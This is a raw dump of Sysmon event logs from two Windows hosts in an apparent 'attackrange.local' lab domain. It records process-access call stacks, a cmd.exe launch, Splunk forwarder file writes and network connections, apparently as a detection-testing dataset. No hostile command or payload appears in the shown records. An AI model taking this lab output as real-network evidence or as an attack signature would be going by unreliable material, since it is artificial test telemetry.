07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+1f9aa4|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+175730|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+16d7a6|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07 154100x80000000000000001048291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.966{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001048290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.493{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880EB383399168C96E80D9DEE024F9ED,SHA256=9C9563914E111F4B4CB05CC4C7E0301A32641A5140B9028A39ACF1E04C8E863E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.308{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57254-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.162{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=035B8861D3C08B46AD8A384BD09F1381,SHA256=97FEDE477AFE88891AF828A43EC64B7C8FEDC7532FA13FB67CCAF0AECAFF647B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.161{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=211494739029E76066F63A62A8DA8075,SHA256=8F1710C66B605BB633773D1263556F03F99B03B11BF4309EECB53DD28CECE7EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:33.956{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A46565A40426D5C50A6203A98367EF,SHA256=569254BFF94B46EEABE2889C573F7BD50C4F2C7A16FFE0491E64BAF326E6491E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=035B8861D3C08B46AD8A384BD09F1381,SHA256=97FEDE477AFE88891AF828A43EC64B7C8FEDC7532FA13FB67CCAF0AECAFF647B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7250CC94FE43BA589661D0A7ABC2851,SHA256=6FAE5E45D45E18614A7E12DFDC478018A6576AA1E1B352CD7E408E3271D0A392,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.360{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57255-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 10341000x80000000000000001048314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.140{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.140{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.140{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.124{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.108{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.024{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.024{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.011{466BC892-F484-60EB-257D-00000000CF01}76681724C:\Windows\system32\conhost.exe{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.993{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000807473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:34.977{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A499489E3CD28DFFA892CB6770128C35,SHA256=5F343D294D400944BD959C2A67DEF2A35E39E7A66F95895027CE317F73DDB311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:34.530{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C579042A7C74BAF88BDC233C3AA4CA2B,SHA256=4A3BFA99932684C94E51C6668D5B6E8C6F77B9F4800E96026D2166020D610E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:35.531{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A7AA034536D350CCA61FA4036B39EC5,SHA256=9BF81B85533002244F00C18662FF2D7CEC9548D22F34B88D033BBF2E4FC86BFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.846{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001048368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.846{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.846{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 